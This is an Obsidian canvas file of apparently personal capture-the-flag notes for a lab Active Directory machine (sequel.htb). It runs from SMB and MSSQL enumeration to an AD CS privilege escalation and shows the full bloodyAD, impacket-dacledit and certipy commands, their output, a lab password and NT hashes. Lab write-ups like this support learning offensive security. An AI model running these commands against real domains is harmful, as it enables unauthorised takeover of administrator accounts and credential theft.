{
	"nodes":[
		{"id":"d552dfe611bb3f87","x":-780,"y":-400,"width":900,"height":523,"type":"file","file":"Pasted image 20250204103044.png"},
		{"id":"66810dd46a9a3b78","x":-780,"y":160,"width":343,"height":60,"type":"text","text":"NMAP - ENUMERATION"},
		{"id":"9fd23d3daba91e46","x":-780,"y":260,"width":900,"height":576,"type":"file","file":"Pasted image 20250204103247.png"},
		{"id":"e81093c0b46217fd","x":-780,"y":1120,"width":900,"height":450,"type":"file","file":"Pasted image 20250204103933.png"},
		{"id":"86d74659e57c8013","x":-780,"y":1000,"width":250,"height":60,"type":"text","text":"SMB - ENUMERATION\n"},
		{"id":"0ac68114875eec83","x":-780,"y":1620,"width":900,"height":491,"type":"file","file":"Pasted image 20250204104920.png"},
		{"id":"3e933981f0a02127","x":-780,"y":2180,"width":1405,"height":400,"type":"file","file":"Pasted image 20250204110401.png"},
		{"id":"827794b883f4807e","x":-780,"y":2620,"width":250,"height":60,"type":"text","text":"we get the accounts.xlsx file "},
		{"id":"8e40f3c21c99055f","x":-780,"y":2720,"width":1412,"height":600,"type":"file","file":"Pasted image 20250204111336.png"},
		{"id":"8fbd2207524093c8","x":-780,"y":3360,"width":314,"height":83,"type":"text","text":"after opening the files, we got credentials"},
		{"id":"4975670cf181ae62","x":-780,"y":3660,"width":1613,"height":220,"type":"file","file":"Pasted image 20250204112517.png"},
		{"id":"ead0ad95b222fe2c","x":-780,"y":3940,"width":1613,"height":168,"type":"file","file":"Pasted image 20250204112639.png"},
		{"id":"89a79d19ce018e07","x":-780,"y":3520,"width":314,"height":80,"type":"text","text":"Looks like the \"SA\" is the sysadmin for the mssql"},
		{"id":"c97b527684968617","x":-780,"y":4180,"width":1613,"height":832,"type":"file","file":"Pasted image 20250204120812.png"},
		{"id":"ed7f8dabbb64051e","x":-780,"y":5060,"width":250,"height":60,"type":"text","text":"after bruteforcing we got the credentials of ryan"},
		{"id":"b1cb1afcc5ae34fb","x":-780,"y":5160,"width":1263,"height":80,"type":"file","file":"Pasted image 20250204121242.png"},
		{"id":"b5e1b4fe98804b56","x":-780,"y":5320,"width":1613,"height":259,"type":"file","file":"Pasted image 20250204121407.png"},
		{"id":"6fdf6dc1ebb45951","x":-780,"y":5642,"width":1613,"height":904,"type":"file","file":"Pasted image 20250204140433.png"},
		{"id":"3c828e2ce9453fe2","x":-780,"y":6546,"width":250,"height":60,"color":"4","type":"text","text":"then we got the 1st flag"},
		{"id":"f7cf0321acc3a445","x":-780,"y":6700,"width":250,"height":60,"type":"text","text":"after running bloodhound"},
		{"id":"8ecfd89f89d40d92","x":-780,"y":6760,"width":1613,"height":1061,"type":"file","file":"Pasted image 20250204121707.png"},
		{"id":"66f4dc5236a2d244","x":-780,"y":7840,"width":451,"height":115,"type":"text","text":"Ryan controls the CA service account (ca_svc) with WriteOwner privilege. This allows control over the CA itself, potentially leading to certificate service abuse."},
		{"id":"2ce3fd1f310dcdf8","x":-780,"y":7980,"width":1613,"height":135,"type":"file","file":"Pasted image 20250204121902.png"},
		{"id":"9e0c07fd8bc2dee9","x":-780,"y":8155,"width":836,"height":145,"color":"4","type":"text","text":"Explanation:\n\n    bloodyAD changes the owner of the ca_svc account to ryan.\n    As the new owner, ryan gains the ability to modify permissions for this account."},
		{"id":"0d754532172a7ec9","x":-780,"y":8320,"width":451,"height":63,"type":"text","text":"the next step is to use impacket-dacledit"},
		{"id":"e989ad3027a51c57","x":-780,"y":8400,"width":716,"height":121,"color":"4","type":"text","text":"impacket-dacledit  -action 'write' -rights 'FullControl' -principal 'ryan' -target 'ca_svc' 'sequel.htb'/\"ryan\":\"WqSZAF6CysDQbGb3\"   \n[*] DACL backed up to dacledit-20250119-224357.bak\n[*] DACL modified successfully!"},
		{"id":"10aa89379063afeb","x":-780,"y":8560,"width":1100,"height":149,"color":"4","type":"text","text":"Explanation:\n\n    impacket-dacledit modifies the DACL (Discretionary Access Control List) of ca_svc.\n    Grants ryan full control over ca_svc, allowing further modifications like password resets or key credential manipulation."},
		{"id":"c2c2171c15c0127a","x":-780,"y":8740,"width":1240,"height":500,"color":"4","type":"text","text":"certipy-ad shadow auto -u 'ryan@sequel.htb' -p \"WqSZAF6CysDQbGb3\" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb -ns 10.10.11.51\nCertipy v4.8.2 - by Oliver Lyak (ly4k)\n\n[*] Targeting user 'ca_svc'\n[*] Generating certificate\n[*] Certificate generated\n[*] Generating Key Credential\n[*] Key Credential generated with DeviceID '21b253ab-df4a-6b5e-7cc4-f4fa0ddbadf6'\n[*] Adding Key Credential with device ID '21b253ab-df4a-6b5e-7cc4-f4fa0ddbadf6' to the Key Credentials for 'ca_svc'\n[*] Successfully added Key Credential with device ID '21b253ab-df4a-6b5e-7cc4-f4fa0ddbadf6' to the Key Credentials for 'ca_svc'\n[*] Authenticating as 'ca_svc' with the certificate\n[*] Using principal: ca_svc@sequel.htb\n[*] Trying to get TGT...\n[*] Got TGT\n[*] Saved credential cache to 'ca_svc.ccache'\n[*] Trying to retrieve NT hash for 'ca_svc'\n[*] Restoring the old Key Credentials for 'ca_svc'\n[*] Successfully restored the old Key Credentials for 'ca_svc'\n[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce"},
		{"id":"4d7efb1302350d65","x":-780,"y":9300,"width":1038,"height":141,"color":"4","type":"text","text":"Explanation:\n\n    certipy-ad shadow generates and adds a new key credential for ca_svc, enabling certificate-based authentication.\n    The tool saves a .ccache file, which can be used for Kerberos-based attacks."},
		{"id":"b94ba11ead548eb0","x":-780,"y":9540,"width":1081,"height":201,"type":"text","text":"KRB5CCNAME=$PWD/ca_svc.ccache certipy-ad template  -k -template DunderMifflinAuthentication  -target dc01.sequel.htb -dc-ip 10.10.11.51\nCertipy v4.8.2 - by Oliver Lyak (ly4k)\n\n[*] Updating certificate template 'DunderMifflinAuthentication'\n[*] Successfully updated 'DunderMifflinAuthentication'"},
		{"id":"5d1b7b2e80961bf0","x":-780,"y":9780,"width":1038,"height":155,"type":"text","text":"    Explanation:\n    Modifies the DunderMifflinAuthentication certificate template to make it usable for escalating privileges.\n    This step adjusts the template’s configuration to allow certificate issuance with escalated privileges."},
		{"id":"62fb9f7d7a526b80","x":-780,"y":10420,"width":889,"height":141,"type":"text","text":"Explanation:\n\n    Requests a certificate with the UPN (User Principal Name) Administrator@sequel.htb, enabling impersonation of the Administrator account."},
		{"id":"837f9855ed57e20e","x":-780,"y":9935,"width":1091,"height":440,"type":"text","text":"certipy-ad req -u ca_svc -hashes 3b181b914e7a9d5508ea1e20bc2b7fce -ca sequel-DC01-CA -target dc01.sequel.htb -dc-ip 10.10.11.51 -template DunderMifflinAuthentication -upn Administrator@sequel.htb -ns 10.10.11.51 -dns 10.10.11.51\nCertipy v4.8.2 - by Oliver Lyak (ly4k)\n\n/usr/lib/python3/dist-packages/certipy/commands/req.py:459: SyntaxWarning: invalid escape sequence '\\('\n  \"(0x[a-zA-Z0-9]+) \\([-]?[0-9]+ \",\n[*] Requesting certificate via RPC\n[*] Successfully requested certificate\n[*] Request ID is 58\n[*] Got certificate with multiple identifications\n    UPN: 'Administrator@sequel.htb'\n    DNS Host Name: '10.10.11.51'\n[*] Certificate has no object SID\n[*] Saved certificate and private key to 'administrator_10.pfx'"},
		{"id":"02b068efd783f2c5","x":-780,"y":10600,"width":1103,"height":399,"type":"text","text":"certipy-ad auth -pfx administrator_10.pfx -dc-ip 10.10.11.51\nCertipy v4.8.2 - by Oliver Lyak (ly4k)\n\n[*] Found multiple identifications in certificate\n[*] Please select one:\n    [0] UPN: 'Administrator@sequel.htb'\n    [1] DNS Host Name: '10.10.11.51'\n> 0\n[*] Using principal: administrator@sequel.htb\n[*] Trying to get TGT...\n[*] Got TGT\n[*] Saved credential cache to 'administrator.ccache'\n[*] Trying to retrieve NT hash for 'administrator'\n[*] Got hash for 'administrator@sequel.htb': aad3b435b51404eeaad3b435b51404ee:7a8d4e04986afa8ed4060f75e5a0b3ff"},
		{"id":"40b7c53792489535","x":-780,"y":10999,"width":998,"height":132,"type":"text","text":"Explanation:\n\n    Authenticates as Administrator using the certificate issued in the previous step, retrieving the NTLM hash."},
		{"id":"b2e21e94b6fdedbe","x":-780,"y":11160,"width":1740,"height":623,"type":"file","file":"Pasted image 20250204141022.png"},
		{"id":"5c2510e8886fa8a6","x":-780,"y":11820,"width":321,"height":50,"color":"4","type":"text","text":"We got the last flag ( root flag )"},
		{"id":"4e6556f675437127","x":-780,"y":11960,"width":1740,"height":1512,"type":"file","file":"Pasted image 20250204141058.png"}
	],
	"edges":[
		{"id":"c9c0ea2ae2aea0fe","fromNode":"2ce3fd1f310dcdf8","fromSide":"left","toNode":"9e0c07fd8bc2dee9","toSide":"left"},
		{"id":"c09b4b94ee2316df","fromNode":"e989ad3027a51c57","fromSide":"left","toNode":"10aa89379063afeb","toSide":"left"},
		{"id":"2e42e21bf78ff42c","fromNode":"c2c2171c15c0127a","fromSide":"left","toNode":"4d7efb1302350d65","toSide":"left"},
		{"id":"309f2669c435d3d9","fromNode":"837f9855ed57e20e","fromSide":"left","toNode":"62fb9f7d7a526b80","toSide":"left"},
		{"id":"a543e465ae1782e7","fromNode":"b94ba11ead548eb0","fromSide":"left","toNode":"5d1b7b2e80961bf0","toSide":"left"},
		{"id":"5f3c859693cb016f","fromNode":"02b068efd783f2c5","fromSide":"left","toNode":"40b7c53792489535","toSide":"left"}
	]
}